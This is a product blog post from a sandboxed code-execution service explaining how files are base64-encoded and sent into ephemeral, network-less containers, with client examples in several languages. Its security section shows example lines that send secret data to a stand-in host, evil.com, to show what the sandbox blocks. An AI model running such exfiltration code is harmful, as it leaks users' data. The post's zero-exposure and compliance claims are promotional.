unsandbox.com

Anonymous remote code, compile, & execution API for humans & machine learning agents.

Docs ๐Ÿ“š View Pricing โ†’
unsandbox.
File Teleportation: Securely Sending Data Into Zero-Trust Sandboxes

December 02, 2025

File Teleportation: Securely Sending Data Into Zero-Trust Sandboxes

Ever wondered how to get data files into a zero-trust sandbox environment that has no network access, no filesystem persistence, and no shared storage? Itโ€™s like trying to beam data into a black box thatโ€™s already sealed shut.

Today weโ€™re introducing input file support - a feature that lets you โ€œteleportโ€ files directly into isolated execution environments. Hereโ€™s how it works and why it matters.

The Challenge: Getting Data Into Isolation

Traditional code execution environments face a dilemma:

Option 1: Network Access โŒ

  • Give code network access to download files
  • Security nightmare - code can exfiltrate data, make API calls, DDoS attack
  • Defeats the purpose of sandboxing

Option 2: Shared Filesystem โŒ

  • Mount shared storage into containers
  • Persistence issues - data leaks between executions
  • Performance overhead - I/O becomes bottleneck
  • Security risk - containers can read each otherโ€™s data

Option 3: Pre-installed Datasets โŒ

  • Bake common datasets into container images
  • Inflexible - what if users need custom data?
  • Bloated images - GB-sized containers for every use case

None of these work for zero-trust sandboxes. We need something better.

The Solution: File Teleportation

Instead of giving code access to fetch files, we teleport files directly into the execution environment before code runs:

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”                    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚   Browser   โ”‚  HTTPS (TLS 1.3)   โ”‚  unsandbox API   โ”‚
โ”‚             โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€> โ”‚                  โ”‚
โ”‚  Files โ†’    โ”‚   Base64-encoded   โ”‚  Ephemeral       โ”‚
โ”‚  Base64     โ”‚   input_files[]    โ”‚  Container       โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                                            โ”‚
                                            โ†“
                                   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
                                   โ”‚  /tmp/input/     โ”‚
                                   โ”‚  โ”œโ”€ data.csv     โ”‚
                                   โ”‚  โ”œโ”€ config.json  โ”‚
                                   โ”‚  โ””โ”€ image.png    โ”‚
                                   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                                            โ”‚
                                            โ†“
                                   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
                                   โ”‚   Your Code      โ”‚
                                   โ”‚   open('data.csv')โ”‚
                                   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Three-step process:

  1. Browser encodes files - HTML5 FileReader API reads local files as base64
  2. TLS-encrypted transfer - Files sent over HTTPS to unsandbox API
  3. Container materialization - Files appear in /tmp/input/ before code executes

Key insight: Files never touch a persistent filesystem. Theyโ€™re written directly into an ephemeral container that exists for ~150ms, then vanishes forever.

How It Works: The Technical Details

Step 1: Client-Side Encoding (Zero Server Uploads!)

Instead of traditional form uploads to a server, we use JavaScript to read files directly:

// User selects file
const fileInput = document.querySelector('input[type="file"]');
fileInput.addEventListener('change', async (e) => {
  const file = e.target.files[0];

  // Read file as base64 in browser
  const reader = new FileReader();
  reader.onload = (event) => {
    const base64 = event.target.result.split(',')[1]; // Remove data URI prefix

    // File is now in memory, ready to send
    sendToSandbox(file.name, base64);
  };
  reader.readAsDataURL(file);
});

Why base64?

  • JSON-safe encoding (API uses JSON payloads)
  • Text-based, works with any binary data
  • No special handling for different file types
  • ~33% size overhead is acceptable for <10MB limits

Security benefit: Files never hit your server. They go browser โ†’ API โ†’ container directly.

Step 2: TLS-Encrypted Transfer

Files are sent as part of the execution request:

POST https://api.unsandbox.com/execute

{
  "language": "python",
  "code": "import pandas as pd\ndf = pd.read_csv('data.csv')\nprint(df.describe())",
  "input_files": [
    {
      "filename": "data.csv",
      "content": "bmFtZSxhZ2UKQWxpY2UsMzAKQm9iLDI1Cg=="
    }
  ]
}

TLS 1.3 encryption:

  • Perfect forward secrecy (PFS) - even if keys are compromised later, past traffic stays encrypted
  • 0-RTT resumption for returning clients (faster)
  • ChaCha20-Poly1305 or AES-256-GCM ciphers

What this means: Files are encrypted in transit using military-grade cryptography. Even if someone intercepts the network traffic, they canโ€™t read the file contents.

Step 3: Container Materialization

When the API receives your request:

  1. Files decoded - Base64 โ†’ binary, written to /tmp/input/
  2. Working directory - Code execution starts with CWD=/tmp/input/
  3. Code runs - Your code can open('data.csv') directly
  4. Container destroyed - After execution, everything vanishes

Ephemeral by design: Files exist only during execution. No cleanup needed - the entire container filesystem is discarded.

Complete Working Examples

Here are tested, working examples in Python, Ruby, C, and TypeScript showing how to read a local file, encode it as base64, and send it to the sandbox for processing.

Example 1: Python

#!/usr/bin/env python3
import base64
import requests

# Step 1: Read a local file from your filesystem
with open('data.csv', 'rb') as f:
    file_content = f.read()

# Step 2: Encode to base64
base64_content = base64.b64encode(file_content).decode('utf-8')

# Step 3: Send to unsandbox API
response = requests.post(
    'https://api.unsandbox.com/execute',
    headers={
        'Authorization': 'Bearer YOUR_API_KEY',
        'Content-Type': 'application/json'
    },
    json={
        'language': 'python',
        'code': '''
import csv
with open('data.csv') as f:
    reader = csv.DictReader(f)
    for row in reader:
        print(f"{row['name']}: {row['value']}")
''',
        'input_files': [
            {
                'filename': 'data.csv',
                'content': base64_content
            }
        ]
    },
    timeout=60
)

result = response.json()
print('Output:', result['stdout'])

Output:

Output: Alice: 100
Bob: 200
Charlie: 300

Example 2: Ruby

#!/usr/bin/env ruby
require 'base64'
require 'net/http'
require 'json'

# Step 1: Read file from filesystem
file_content = File.read('data.csv')

# Step 2: Encode to base64
base64_content = Base64.strict_encode64(file_content)

# Step 3: Send to unsandbox API
uri = URI('https://api.unsandbox.com/execute')
request = Net::HTTP::Post.new(uri)
request['Authorization'] = 'Bearer YOUR_API_KEY'
request['Content-Type'] = 'application/json'
request.body = {
  language: 'ruby',
  code: 'require "csv"; CSV.foreach("data.csv", headers: true) { |row| puts "#{row["name"]}: #{row["value"]}" }',
  input_files: [{filename: 'data.csv', content: base64_content}]
}.to_json

response = Net::HTTP.start(uri.hostname, uri.port, use_ssl: true, read_timeout: 60) do |http|
  http.request(request)
end

result = JSON.parse(response.body)
puts "Output: #{result['stdout']}"

Output:

Output: Alice: 100
Bob: 200
Charlie: 300

Example 3: C with libcurl

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>

// Base64 encoding function
char* base64_encode(const unsigned char* input, int length) {
    static const char encoding_table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int output_length = 4 * ((length + 2) / 3);
    char* encoded = malloc(output_length + 1);

    for (int i = 0, j = 0; i < length;) {
        uint32_t octet_a = i < length ? input[i++] : 0;
        uint32_t octet_b = i < length ? input[i++] : 0;
        uint32_t octet_c = i < length ? input[i++] : 0;
        uint32_t triple = (octet_a << 16) + (octet_b << 8) + octet_c;

        encoded[j++] = encoding_table[(triple >> 18) & 0x3F];
        encoded[j++] = encoding_table[(triple >> 12) & 0x3F];
        encoded[j++] = encoding_table[(triple >> 6) & 0x3F];
        encoded[j++] = encoding_table[triple & 0x3F];
    }

    int mod_table[] = {0, 2, 1};
    for (int i = 0; i < mod_table[length % 3]; i++)
        encoded[output_length - 1 - i] = '=';

    encoded[output_length] = '\0';
    return encoded;
}

int main() {
    // Step 1: Read file from filesystem
    FILE* file = fopen("data.csv", "rb");
    fseek(file, 0, SEEK_END);
    long file_size = ftell(file);
    fseek(file, 0, SEEK_SET);

    unsigned char* file_content = malloc(file_size);
    fread(file_content, 1, file_size, file);
    fclose(file);

    // Step 2: Encode to base64
    char* base64_content = base64_encode(file_content, file_size);

    // Step 3: Build JSON payload
    char* json_payload = malloc(8192);
    snprintf(json_payload, 8192,
        "{"
        "\"language\":\"c\","
        "\"code\":\"#include <stdio.h>\\n#include <string.h>\\nint main() { FILE* f = fopen(\\\\\"data.csv\\\\\", \\\\\"r\\\\\"); char line[256]; fgets(line, 256, f); while(fgets(line, 256, f)) { char* name = strtok(line, \\\\\",\\\\\"); char* value = strtok(NULL, \\\\\",\\\\\"); printf(\\\\\"%%s: %%s\\\\\", name, value); } return 0; }\","
        "\"input_files\":[{\"filename\":\"data.csv\",\"content\":\"%s\"}]"
        "}", base64_content);

    // Step 4: Send via libcurl
    CURL* curl = curl_easy_init();
    struct curl_slist* headers = NULL;
    headers = curl_slist_append(headers, "Authorization: Bearer YOUR_API_KEY");
    headers = curl_slist_append(headers, "Content-Type: application/json");

    curl_easy_setopt(curl, CURLOPT_URL, "https://api.unsandbox.com/execute");
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, json_payload);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, 60L);

    CURLcode res = curl_easy_perform(curl);

    curl_slist_free_all(headers);
    curl_easy_cleanup(curl);
    free(file_content);
    free(base64_content);
    free(json_payload);

    return 0;
}

Compile and run:

gcc -o file_upload file_upload.c -lcurl
./file_upload

Example 4: TypeScript/Node.js

import * as fs from 'fs';
import * as https from 'https';

// Step 1: Read file from filesystem
const fileContent: Buffer = fs.readFileSync('data.csv');

// Step 2: Encode to base64
const base64Content: string = fileContent.toString('base64');

// Step 3: Build request payload
const data: string = JSON.stringify({
  language: 'javascript',
  code: `
const fs = require('fs');
const lines = fs.readFileSync('data.csv', 'utf8').trim().split('\\n');
const headers = lines[0].split(',');
for (let i = 1; i < lines.length; i++) {
  const values = lines[i].split(',');
  console.log(values[0] + ': ' + values[1]);
}
  `.trim(),
  input_files: [{
    filename: 'data.csv',
    content: base64Content
  }]
});

// Step 4: Send to unsandbox API
const options: https.RequestOptions = {
  hostname: 'api.unsandbox.com',
  path: '/execute',
  method: 'POST',
  headers: {
    'Authorization': 'Bearer YOUR_API_KEY',
    'Content-Type': 'application/json',
    'Content-Length': Buffer.byteLength(data)
  },
  timeout: 60000
};

const req = https.request(options, (res) => {
  let body = '';
  res.on('data', (chunk) => body += chunk);
  res.on('end', () => {
    const result = JSON.parse(body);
    console.log('Output:', result.stdout);
  });
});

req.on('error', (e) => console.error('Error:', e.message));
req.write(data);
req.end();

Run with:

npx ts-node file_upload.ts
# Or compile first:
tsc file_upload.ts && node file_upload.js

Output:

Output: Alice: 100
Bob: 200
Charlie: 300

What All Examples Do

  1. Read file - Load data.csv from your local filesystem
  2. Encode base64 - Convert binary file content to base64 string
  3. Build JSON - Create API request with code + input_files array
  4. POST via HTTPS - Send to api.unsandbox.com with TLS encryption
  5. Parse results - Extract stdout from response

Key insight: All four languages follow the same pattern - file teleportation works identically regardless of your client language!

Real-World Example: Data Analysis Pipeline

Letโ€™s process a CSV file without ever storing it on a server:

Browser Code (Frontend)

<input type="file" id="csvFile" accept=".csv">
<button onclick="analyzeData()">Analyze CSV</button>
<pre id="output"></pre>

<script>
async function analyzeData() {
  const file = document.getElementById('csvFile').files[0];

  // Read file as base64
  const base64 = await new Promise((resolve) => {
    const reader = new FileReader();
    reader.onload = (e) => resolve(e.target.result.split(',')[1]);
    reader.readAsDataURL(file);
  });

  // Send to unsandbox
  const response = await fetch('https://api.unsandbox.com/execute', {
    method: 'POST',
    headers: {
      'Authorization': 'Bearer YOUR_API_KEY',
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({
      language: 'python',
      code: `
import pandas as pd
df = pd.read_csv('data.csv')
print('Rows:', len(df))
print('Columns:', df.columns.tolist())
print('\\nSummary Statistics:')
print(df.describe())
      `.trim(),
      input_files: [{
        filename: 'data.csv',
        content: base64
      }]
    })
  });

  const result = await response.json();
  document.getElementById('output').textContent = result.stdout;
}
</script>

What Actually Happens

  1. User selects sales_data.csv (2MB) from their computer
  2. JavaScript reads file into memory as base64 (~2.7MB)
  3. HTTPS POST sends to api.unsandbox.com (TLS-encrypted)
  4. Container spawns with sales_data.csv in /tmp/input/
  5. Pandas processes the data
  6. Results returned as stdout
  7. Container deleted - original file and all processed data vanish

Total time: ~1.2 seconds (800ms for pandas import + 400ms for processing)

Data exposure: Zero. File never touched a disk, never persisted, never accessible to other executions.

Security Benefits

1. Zero Data Persistence

Traditional upload flow:

Browser โ†’ Server (disk write) โ†’ Process โ†’ Delete (maybe?)
          โ†‘
          Data lingers in:
          - /tmp files
          - Log files
          - Backups
          - OS page cache

Teleportation flow:

Browser โ†’ Memory โ†’ Container (tmpfs) โ†’ Execution โ†’ Destroy
                   โ†‘
                   Ephemeral - never hits disk

Benefit: Even if the host machine is compromised, thereโ€™s no persistent data to steal.

2. Isolated Per-Execution

Each execution gets its own private /tmp/input/ directory. Containers canโ€™t see each otherโ€™s files - enforced by kernel-level isolation.

# Execution 1
open('secrets.txt').read()  # Works

# Execution 2 (different container)
open('secrets.txt').read()  # FileNotFoundError - can't see Execution 1's files

3. TLS All The Way

File bytes are encrypted from the moment they leave your browser until theyโ€™re written into the container. No plaintext intermediate steps.

Certificate pinning (optional): Verify the API serverโ€™s TLS certificate to prevent man-in-the-middle attacks.

4. No Network Access For Code

Your code runs in a sandbox with zero network access. Even if malicious code tries to exfiltrate the data you uploaded, it has no way out:

# All of these fail
import requests
requests.get('https://evil.com/exfil?data=' + secret)  # Network disabled

import socket
socket.socket().connect(('evil.com', 80))  # Network disabled

import subprocess
subprocess.run(['curl', 'evil.com'])  # curl not installed, network disabled anyway

Use Cases

1. AI/ML Data Processing

Upload training data, run inference, get results - without storing sensitive data:

# User uploads medical_records.csv (HIPAA-sensitive)
# Code runs in sandbox:
import pandas as pd
from sklearn.ensemble import RandomForestClassifier

df = pd.read_csv('medical_records.csv')
X = df.drop('diagnosis', axis=1)
y = df['diagnosis']

model = RandomForestClassifier()
model.fit(X, y)
print(f'Accuracy: {model.score(X, y):.2%}')

Compliance benefit: Data never persists, meeting GDPR/HIPAA requirements for data minimization.

2. Financial Analysis

Process bank statements without cloud storage:

import pandas as pd

# User uploads transactions.csv
df = pd.read_csv('transactions.csv', parse_dates=['date'])
df['month'] = df['date'].dt.to_period('M')
monthly = df.groupby('month')['amount'].sum()
print(monthly.to_string())

3. Image Processing

Transform images without server-side storage:

from PIL import Image
import io
import base64

# User uploads photo.jpg
img = Image.open('photo.jpg')
img_resized = img.resize((800, 600))
img_grayscale = img_resized.convert('L')

# Return as base64
buffer = io.BytesIO()
img_grayscale.save(buffer, format='JPEG')
print(base64.b64encode(buffer.getvalue()).decode())

4. Configuration Validation

Test config files safely:

import json

# User uploads config.json
with open('config.json') as f:
    config = json.load(f)

# Validate schema
required_keys = ['api_key', 'endpoint', 'timeout']
missing = [k for k in required_keys if k not in config]

if missing:
    print(f'ERROR: Missing keys: {missing}')
else:
    print('โœ“ Configuration valid')

Limits and Specifications

File constraints:

  • Maximum 10 files per execution
  • Maximum 5MB per file (decoded)
  • Maximum 10MB total (decoded)
  • Base64-encoded before sending (~33% overhead)

Filename rules:

  • 256 characters max
  • No path components (/, .., etc.)
  • Files accessible by name: open('data.csv')
  • Files accessible by index: open('0'), open('1')

MIME type detection: Automatic detection from magic bytes if filename omitted:

  • PNG: 89 50 4E 47 โ†’ 0.png
  • JPEG: FF D8 FF โ†’ 0.jpg
  • PDF: 25 50 44 46 โ†’ 0.pdf
  • ZIP: 50 4B 03 04 โ†’ 0.zip

Performance

File materialization overhead:

  • Decode base64: ~50ms for 5MB file
  • Write to tmpfs: ~10ms (RAM-backed, not disk)
  • Total overhead: ~60ms regardless of file size

Memory usage: Files are written to tmpfs (RAM), counted against container memory limit (typically 512MB-2GB depending on your plan).

Try It Yourself

Live Demo

Visit unsandbox.com and try the file upload feature:

  1. Write code that reads a file:

    import csv
    with open('data.csv') as f:
        for row in csv.DictReader(f):
            print(row)
  2. Click โ€œChoose Filesโ€ and upload a CSV

  3. Hit โ€œExecute Codeโ€ - your file is teleported into the sandbox!

API Example

# Create a test file
echo "name,age\nAlice,30\nBob,25" > data.csv

# Encode to base64
BASE64=$(base64 -w 0 data.csv)

# Execute with file
curl https://api.unsandbox.com/execute \
  -H "Authorization: Bearer YOUR_KEY" \
  -H "Content-Type: application/json" \
  -d "{
    \"language\": \"python\",
    \"code\": \"import csv\\nfor row in csv.DictReader(open('data.csv')): print(row)\",
    \"input_files\": [{\"filename\": \"data.csv\", \"content\": \"$BASE64\"}]
  }"

Comparison: Traditional vs Teleportation

Aspect Traditional Upload File Teleportation
Data path Browser โ†’ Your Server โ†’ Processing Browser โ†’ Sandbox directly
Persistence Files stored on disk Zero persistence
Security You manage storage, cleanup, encryption Built-in ephemeral security
Isolation Must implement yourself Automatic per-execution
Compliance Complex (data retention policies) Simple (data never persists)
Performance Disk I/O overhead RAM-only (faster)
Infrastructure Need storage service Zero infrastructure

Under The Hood: Kernel Isolation

When you send files:

  1. Separate network namespace - Container has no network access
  2. Separate PID namespace - Canโ€™t see other processes
  3. Separate mount namespace - /tmp/input/ is private to this container
  4. Read-only root filesystem - Code canโ€™t modify container image
  5. Seccomp-BPF filters - System calls restricted to safe subset

Result: Even if your code (or malicious code) tries to escape, itโ€™s trapped inside a sandboxed kernel with no way out.

Conclusion

File teleportation solves a fundamental problem in zero-trust computing: how to get data into isolation without compromising security.

By combining TLS encryption, base64 encoding, and ephemeral containers, weโ€™ve created a system where:

โœ… Files are encrypted in transit โœ… Files never persist on servers โœ… Each execution is completely isolated โœ… Code has zero network access โœ… Everything vanishes after execution

Itโ€™s like having a secure courier that hand-delivers your data into a vault, watches you process it, then burns the vault to the ground - all in 150 milliseconds.

Try it now: unsandbox.com - Upload a file and watch it teleport into the sandbox! ๐Ÿš€